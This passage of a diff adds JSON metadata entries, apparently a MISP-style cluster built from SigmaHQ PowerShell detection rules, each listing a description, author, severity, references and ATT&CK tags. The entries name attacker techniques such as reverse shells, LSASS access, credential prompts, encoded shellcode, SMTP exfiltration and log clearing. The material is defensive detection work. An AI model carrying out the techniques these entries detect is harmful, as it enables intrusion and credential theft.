"https://powersploit.readthedocs.io/en/stable/Recon/README", + "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", + "https://thedfirreport.com/2020/10/08/ryuks-return", + "https://adsecurity.org/?p=2277", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "value": "Malicious PowerView PowerShell Commandlets" + }, + { + "description": "Detects PowerShell calling a credential prompt", + "meta": { + "author": "John Lambert (idea), Florian Roth (rule)", + "creation_date": "2017/04/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_prompt_credentials.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/850381440629981184", + "https://t.co/ezOTGy1a1G", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "value": "PowerShell Credential Prompt" + }, + { + "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/04", + "falsepositive": [ + "Unlikely" + ], + "filename": "posh_ps_psasyncshell.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/JoelGMSec/PSAsyncShell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "afd3df04-948d-46f6-ae44-25966c44b97f", + "value": "PSAsyncShell - 
Asynchronous TCP Reverse Shell" + }, + { + "description": "Detects the use of PSAttack PowerShell hack tool", + "meta": { + "author": "Sean Metcalf (source), Florian Roth (rule)", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_psattack.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psattack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "value": "PowerShell PSAttack" + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/06", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_remote_session_creation.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", + "value": "PowerShell Remote Session Creation" + }, + { + "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", + "meta": { + "author": "frack113", + "creation_date": "2022/01/15", + "falsepositive": [ 
+ "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_remove_item_path.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remove_item_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "b8af5f36-1361-4ebe-9e76-e36128d947bf", + "value": "Use Remove-Item to Delete File" + }, + { + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_request_kerberos_ticket.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "a861d835-af37-4930-bcd6-5b178bfb54df", + "value": "Request A Single Ticket via PowerShell" + }, + { + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "meta": { + 
"author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "creation_date": "2020/10/10", + "falsepositive": [ + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + ], + "filename": "posh_ps_root_certificate_installed.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ] + }, + "uuid": "42821614-9264-4761-acfc-5772c3286f76", + "value": "Root Certificate Installed - PowerShell" + }, + { + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/01", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_run_from_mount_diskimage.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso", + "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ] + }, + "uuid": "902cedee-0398-4e3a-8183-6f3a89773a96", + "value": "Suspicious Invoke-Item From Mount-DiskImage" + }, + { + "description": "Adversaries may attempt to get a listing of security 
software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_security_software_discovery.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ] + }, + "uuid": "904e8e61-8edf-4350-b59c-b905fc8e810c", + "value": "Security Software Discovery by Powershell" + }, + { + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/09/26", + "falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_send_mailmessage.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", + "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": 
"9a7afa56-4762-43eb-807d-c3dc9ffe211b", + "value": "Powershell Exfiltration Over SMTP" + }, + { + "description": "Detect adversaries enumerate sensitive files", + "meta": { + "author": "frack113", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_sensitive_file_discovery.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/malmoeb/status/1570814999370801158", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "7d416556-6502-45b2-9bad-9d2f05f38997", + "value": "Powershell Sensitive File Discovery" + }, + { + "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "meta": { + "author": "frack113", + "creation_date": "2021/10/20", + "falsepositive": [ + "Administrator script" + ], + "filename": "posh_ps_set_policies_to_unsecure_level.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", + "https://adsecurity.org/?p=2604", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "61d0475c-173f-4844-86f7-f3eebae1c66b", + "value": "Change PowerShell Policies to an Insecure Level - PowerShell" + }, + { + "description": "Detects Base64 encoded Shellcode", + "meta": { + "author": "David Ledbetter (shellcode), Florian Roth (rule)", + "creation_date": "2018/11/17", + "falsepositive": [ + "Unknown" + ], + "filename": 
"posh_ps_shellcode_b64.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1063072865992523776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "value": "PowerShell ShellCode" + }, + { + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_shellintel_malicious_commandlets.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Shellntel/scripts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "value": "Malicious ShellIntel PowerShell Commandlets" + }, + { + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/16", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "posh_ps_software_discovery.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", + "https://github.com/harleyQu1nn/AggressorScripts", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518" + ] + }, + "uuid": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", + "value": "Detected Windows Software Discovery - PowerShell" + }, + { + "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", + "meta": { + "author": "frack113", + "creation_date": "2021/09/02", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_store_file_in_alternate_data_stream.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "value": "Powershell Store File In Alternate Data Stream" + }, + { + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_ad_group_reco.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "88f0884b-331d-403d-a3a1-b668cf035603", + "value": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock" + }, + { + "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/12", + "falsepositive": [ + "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" + ], + "filename": "posh_ps_susp_clear_eventlog.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/oroneequalsone/status/1568432028361830402", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001" + ] + }, + "uuid": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "value": "Suspicious Eventlog Clear" + }, + { + "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_directory_enum.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + 
"https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "162e69a7-7981-4344-84a9-0f1c9a217a52", + "value": "Powershell Directory Enumeration" + }, + { + "description": "Detects suspicious PowerShell download command", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/05", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "filename": "posh_ps_susp_download.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", + "value": "Suspicious PowerShell Download - Powershell Script" + }, + { + "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/02", + "falsepositive": [ + "Legitimate administration script" + ], + "filename": "posh_ps_susp_execute_batch_script.yml", + "level": "medium", + "logsource.category": "ps_script", + 
"logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "b5522a23-82da-44e5-9c8b-e10ed8955f88", + "value": "Powershell Execute Batch Script" + }, + { + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/04/23", + "falsepositive": [ + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + ], + "filename": "posh_ps_susp_export_pfxcertificate.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", + "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ] + }, + "uuid": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "value": "Suspicious Export-PfxCertificate" + }, + { + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + "meta": { + "author": "frack113", + 
"creation_date": "2021/12/19", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_extracting.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "bd5971a7-626d-46ab-8176-ed643f694f68", + "value": "Extracting Information with PowerShell" + }, + { + "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/21", + "falsepositive": [ + "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" + ], + "filename": "posh_ps_susp_follina_execution.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1537919885031772161", + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "03409c93-a7c7-49ba-9a4c-a00badf2a153", + "value": "Troubleshooting Pack Cmdlet Execution" + }, + { + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/04/23", + "falsepositive": [ + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + ], + "filename": 
"posh_ps_susp_getprocess_lsass.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/PythonResponder/status/1385064506049630211", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "value": "PowerShell Get-Process LSASS in ScriptBlock" + }, + { + "description": "Detects suspicious Powershell code that execute COM Objects", + "meta": { + "author": "frack113", + "creation_date": "2022/04/02", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_gettypefromclsid.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", + "value": "Suspicious GetTypeFromCLSID ShellExecute" + }, + { + "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", + "https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1201" + ] + }, + "uuid": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", + "value": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy" + }, + { + "description": "Detects the use of PowerShell to identify the current logged user.", + "meta": { + "author": "frack113", + "creation_date": "2022/04/04", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_get_current_user.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", + "value": "Suspicious PowerShell Get Current User" + }, + { + "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", + "meta": { + "author": "frack113", + "creation_date": "2022/06/04", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_get_gpo.yml", + "level": "low", + "logsource.category": 
"ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", + "https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1615" + ] + }, + "uuid": "eb2fd349-ec67-4caa-9143-d79c7fb34441", + "value": "Suspicious GPO Discovery With Get-GPO" + }, + { + "description": "Get the processes that are running on the local computer.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_get_process.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ] + }, + "uuid": "af4c87ce-bdda-4215-b998-15220772e993", + "value": "Suspicious Process Discovery With Get-Process" + }, + { + "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", + "meta": { + "author": "frack113", + "creation_date": "2022/01/12", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_gwmi.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/datasources/DS0005/", + 
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546" + ] + }, + "uuid": "0332a266-b584-47b4-933d-a00b103e1b37", + "value": "Suspicious Get-WmiObject" + }, + { + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", + "meta": { + "author": "frack113", + "creation_date": "2022/04/09", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_hyper_v_condlet.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.006" + ] + }, + "uuid": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "value": "Suspicious Hyper-V Cmdlets" + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Florian Roth (rule)", + "creation_date": "2017/03/12", + "falsepositive": [ + "Very special / sneaky PowerShell scripts" + ], + "filename": "posh_ps_susp_invocation_generic.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": 
"ed965133-513f-41d9-a441-e38076a0798f", + "value": "Suspicious PowerShell Invocations - Generic" + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Florian Roth (rule), Jonhnathan Ribeiro", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_invocation_specific.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "value": "Suspicious PowerShell Invocations - Specific" + }, + { + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_invoke_webrequest_useragent.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + 